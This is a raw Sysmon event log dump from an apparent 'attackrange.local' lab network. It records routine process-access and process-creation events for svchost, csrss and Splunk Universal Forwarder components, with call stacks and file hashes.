07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806466Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806465Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F350-60EB-4A79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806464Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F350-60EB-4A79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806463Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.908{0C1E0330-F350-60EB-4A79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000806462Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.438{0C1E0330-F350-60EB-4979-00000000D001}9603868C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806461Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F350-60EB-4979-00000000D001}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806460Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806459Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806458Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806457Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806456Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806455Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806454Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806453Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806452Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806451Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.220{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F350-60EB-4979-00000000D001}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806450Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.220{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F350-60EB-4979-00000000D001}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806449Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.220{0C1E0330-F350-60EB-4979-00000000D001}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806448Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.188{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3560A814645FCD367141B4DFAEB1A38,SHA256=FF0F961C71A53C797D4814BD4521F2C16F88BA54F0365785A99401DB13FC7685,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:25.576{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29FF22A25AFBE585E547996BE25D26CE,SHA256=BDFB989C2434C586617F33114C6D171D65A98E329F78321403F983AA450E5953,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806491Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F351-60EB-4B79-00000000D001}1272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806490Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806489Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806488Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806487Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806486Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806485Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb